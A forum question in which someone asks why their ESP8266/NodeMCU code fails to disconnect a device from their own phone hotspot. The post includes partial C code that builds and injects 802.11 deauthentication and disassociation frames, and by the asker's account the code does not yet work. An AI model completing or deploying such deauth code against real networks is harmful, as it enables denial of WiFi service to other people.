# Sending Deauthentication Packets by esp8266

Tags: esp8266, nodemcu

I am trying to implement a simple WiFi deauther using my nodemcu but i can't see any disconnection b/w AP(my android's hotspot) & Station ( my second android device)
But when i am using a third party tool like Wi-PWN ( available on GitHub ) , is working.

So its clear that i am doing something wrong in Deauthentication process

Here is some parts of code

```
// Channel to perform deauth
uint8_t channel = 0;

// Packet buffer
uint8_t packet_buffer[128];

// DeAuth template
uint8_t template_da[26] = {
        0xc0, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0xCC, 0xCC, 0xCC, 0xCC, 
        0xCC, 0xCC, 0x00, 0x00, 0x01, 
        0x00};

uint16_t create_packet(uint8_t *buf, uint8_t *client, uint8_t *ap, uint8_t type)
{
  int i = 0;

  memcpy(buf, template_da, 26);
  // Destination
  memcpy(buf + 4, client, ETH_MAC_LEN);
  // Sender
  memcpy(buf + 10, ap, ETH_MAC_LEN);
  buf[0] = type;

  return 26;
}

/* Sends deauth packets. */
void deauth(uint8_t *c, uint8_t *ap, uint16_t seq)
{
  uint8_t i = 0;
  uint16_t sz = 0;
  sz = create_packet(packet_buffer, c, ap, 0xc0); // 0xc0 for deauth 

  wifi_send_pkt_freedom(packet_buffer, sz, 0);
  sz = create_packet(packet_buffer, c, ap, 0xa0); // xa0 for disassociation
  wifi_send_pkt_freedom(packet_buffer, sz, 0);
  delay(1);
  }
}
```

Edit : I know the mac address of both AP & Station so there could be no mistake in filling mac while creating packet.